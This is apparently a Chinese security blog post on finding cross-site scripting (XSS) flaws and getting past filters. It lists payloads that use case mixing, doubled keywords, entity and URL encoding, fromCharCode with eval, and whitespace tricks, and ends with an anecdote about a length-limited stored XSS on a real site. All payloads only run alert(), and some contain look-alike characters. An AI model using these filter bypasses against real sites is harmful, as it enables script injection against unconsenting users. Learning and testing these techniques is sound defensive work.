XSS 绕过思路 bypass 之日天日地日空气

前文

Hello，大家好，我是None Sec的C_soon5，今天给大家讲讲XSS Bypass

XSS挖掘思路

1：输入点和输出点进行XSS

输入点

URL参数

表单内容

JSONP

输出点

输出在标签之间，例如：<script>输出</script>

输出在属性之中，例如：<input value="输出" name="keyword">

输出在注释之中，例如：//document.getElementById("order_select").value="输出"

2：扫描器

这里强烈推荐Xray，配合被动扫描，简直比一刀999还爽

Bypass

之前我根据CTF特训营的XSS Bypass写了篇文章：XSS绕WAF，大家可以看看

1：未经过任何过滤直接输出

<script>alert(1)</script>

<svg/οnlοad=alert(1)>

<img src=# οnerrοr=alert(1)>

<img src=# οnerrοr="javascript:alert(1)">

<a href=# οnmοuseοver=alert(1)>click</a>

<a href="javascript:alert(1)">click</a>

<iframe/οnlοad=alert(1)></iframe>

2：过滤关键字绕过

a、大小写绕过（仅限于未先转换为小写，直接替换关键字的情形）

<Script>alert(1)</scRipt>

<img srC=# onError=alErt(1)></img>

<a href=# onMouseover=Alert(1)></a>

b、双写关键词绕过（仅限于将关键字替换为空的情形，且仅仅替换一次的情形）

<scriscriptpt>alert(1)</scscriptript>

<img src=# onerronerroror=alert(1)></img>

c、编码绕过

编码绕过知识不是很了解，可以看我之前的文章：XSS编码绕过讲解

放一些我常用的编码网站：编码解码在线、107000工具站、jsons、HTML字符实体转换

HTML实体字符

注意：标签名不能被编码

这里能绕过的原因就是因为HTML编码的地方在属性中，会自动解码

编码前

<a href="javascript:alert(1)">

编码后

<a href="javascript:alert(1)">click</a>

在放一个经典的例子

<a href="%26%23x6a%3B%26%23x61%3B%26%23x76%3B%26%23x61%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%0A%26%23x74%3B%26%23x3a%3B%26%23x25%3B%26%23x35%3B%26%23x63%3B%26%23x25%3B%26%23x37%3B%26%23x35%3B%26%23x25%3B%26%23x33%3B%0A%26%23x30%3B%26%23x25%3B%26%23x33%3B%26%23x30%3B%26%23x25%3B%26%23x33%3B%26%23x36%3B%26%23x25%3B%26%23x33%3B%26%23x31%3B%0A%26%23x25%3B%26%23x35%3B%26%23x63%3B%26%23x25%3B%26%23x37%3B%26%23x35%3B%26%23x25%3B%26%23x33%3B%26%23x30%3B%26%23x25%3B%0A%26%23x33%3B%26%23x30%3B%26%23x25%3B%26%23x33%3B%26%23x36%3B%26%23x25%3B%26%23x36%3B%26%23x33%3B%26%23x25%3B%26%23x35%3B%0A%26%23x63%3B%26%23x25%3B%26%23x37%3B%26%23x35%3B%26%23x25%3B%26%23x33%3B%26%23x30%3B%26%23x25%3B%26%23x33%3B%26%23x30%3B%0A%26%23x25%3B%26%23x33%3B%26%23x36%3B%26%23x25%3B%26%23x33%3B%26%23x35%3B%26%23x25%3B%26%23x35%3B%26%23x63%3B%26%23x25%3B%0A%26%23x37%3B%26%23x35%3B%26%23x25%3B%26%23x33%3B%26%23x30%3B%26%23x25%3B%26%23x33%3B%26%23x30%3B%26%23x25%3B%26%23x33%3B%0A%26%23x37%3B%26%23x25%3B%26%23x33%3B%26%23x32%3B%26%23x25%3B%26%23x35%3B%26%23x63%3B%26%23x25%3B%26%23x37%3B%26%23x35%3B%0A%26%23x25%3B%26%23x33%3B%26%23x30%3B%26%23x25%3B%26%23x33%3B%26%23x30%3B%26%23x25%3B%26%23x33%3B%26%23x37%3B%26%23x25%3B%0A%26%23x33%3B%26%23x34%3B%26%23x28%3B%26%23x31%3B%26%23x35%3B%26%23x29%3B">click</a>

最后的形式是以URL形式的，因为实体化中有#，#中在URL是注释的意思，传不过去

解码顺序：URL->HTML->URL->JS

编码顺序：JS->URL->HTML->URL（与解码顺序相反）

因为在属性中，所以先HTML解码，结果如下

然后因为在href中，所以进行URL编码

最后因为Schema为Javascript，进行JS解码

最终结果就是：<a href="javascript:alert(15)">

3：过滤引号绕过

a、使用“/”替换引号

<script>alert(/hello/)</script>

<svg/οnlοad=alert(/hello/)>

<iframe/οnlοad=alert(/hello/)></iframe>

<img src=# οnerrοr=alert(/hello/)>

b、使用String.fromCharCode

fromCharCode可以对利用代码中的引号进行编码处理，但是需要利用eval函数结合进行使用

编码前

<script>alert('insight-labs')</script>

编码后<script>eval(String.fromCharCode(97,108,101,114,116,40,39,105,110,115,105,103,104,116,45,108,97,98,115,39,41))</script>

4：过滤空格绕过

使用%0d、%0a绕过

编码前：<img src=x οnerrοr=alert(1)>

编码后：<img%0dsrc=1%0dοnerrοr=alert(/1/)>

<svg/οnlοad=alert(1)> 标签名称和第一个属性间可以使用 "/" 代替空格

扩展知识点

1：拦截JS黑魔法

首先要了解CSS语法的知识，简单选择器和复杂选择器，定义在<style>标签中，结尾有分号

简单选择器

复杂选择器

黑魔法

思路：导入一张图片，用 )}</style> 标签闭合，进行XSS

2：JS解析模型

a.源码处理

判断代码语法是否正确

b.函数变量注册

函数和变量注册到全局中

实例

这里放一个某专属的存储XSS

思路当时就是在个人介绍处输入<a> 嗯没有过滤感觉有戏了

然后就直接上payload：<img src=x οnerrοr=alert(1)>

然后就发现过滤了事件属性和敏感的关键词

然后经过了几次的尝试发现还有长度限制 30位

但是<script>标签没有过滤呀没有</script>的闭合也是没用的

我就懵逼了这样的话就算能过这个也没有办法利用阿肯定危害降低了

不行没啥思路了去群里求救这里z神闪亮登场了

来个一个超短的payload：

把js文件当做首页就完事只需要26个字符串

（时间太久已经没图了哈哈哈哈哈）